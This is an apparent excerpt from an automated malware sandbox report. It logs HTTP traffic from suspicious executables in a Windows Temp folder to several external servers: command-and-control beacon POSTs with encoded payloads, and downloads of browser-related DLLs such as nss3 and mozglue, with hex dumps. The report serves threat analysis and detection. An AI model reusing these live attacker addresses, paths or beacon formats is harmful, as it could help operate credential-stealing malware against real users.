                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.127305984 CET1236INData Raw: 00 00 00 00 00 0f 1f 00 89 4d e8 8b 0c 0f 89 4d d4 89 ce 89 c1 d3 e6 09 d6 89 75 e0 8b 45 e8 8b 4d ec 01 c8 83 c0 01 0f b6 c0 8b 4d f0 0f b6 0c 01 00 cb 0f b6 f3 8b 55 f0 0f b6 14 32 8b 7d f0 88 14 07 8b 45 f0 88 0c 30 00 ca 0f b6 c2 8b 4d f0 0f
                                                                                                                                                                                                                                                              Data Ascii: MMuEMMU2}E0MEEMLEE0}M1MMEUU}47}4E0UMUU}47
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:39.076142073 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:39.513606071 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:39 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                              ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 608080
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:40.699064016 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:41.135471106 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:40 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                              ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 450024
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.085360050 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:42.521893024 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:42 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                              ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 2046288
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:46.091733932 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:46.528183937 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:46 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                              ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 257872
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:47.553618908 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:47.990360975 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:47 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                              ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Content-Length: 80880
                                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              73192.168.2.450164185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:30.743231058 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:32.060641050 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:31 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              74192.168.2.450165212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:30.743709087 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:32.076106071 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:31 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              75192.168.2.450166185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:33.855252028 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:35.192888021 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:34 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              76192.168.2.450167212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:33.975438118 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:35.262638092 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:35 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              77192.168.2.450170185.156.73.23805548C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:34.936768055 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:36.263226986 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:35 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              78192.168.2.450171212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.014396906 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:38.307065010 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:38 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              79192.168.2.450172185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:37.156591892 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:38.476145983 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:38 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              80192.168.2.450173185.156.73.23805548C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:38.979893923 CET395OUTGET /files/download HTTP/1.1
                                                                                                                                                                                                                                                              Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                                                                                              Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                                                                                              Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                                                                                              Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                                                                                              User-Agent: C
                                                                                                                                                                                                                                                              Host: 185.156.73.23
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:40.283341885 CET204INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:39 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 1
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 30
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              81192.168.2.450175212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:40.631380081 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:41.910341024 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:41 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              82192.168.2.450176185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:18:40.631534100 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
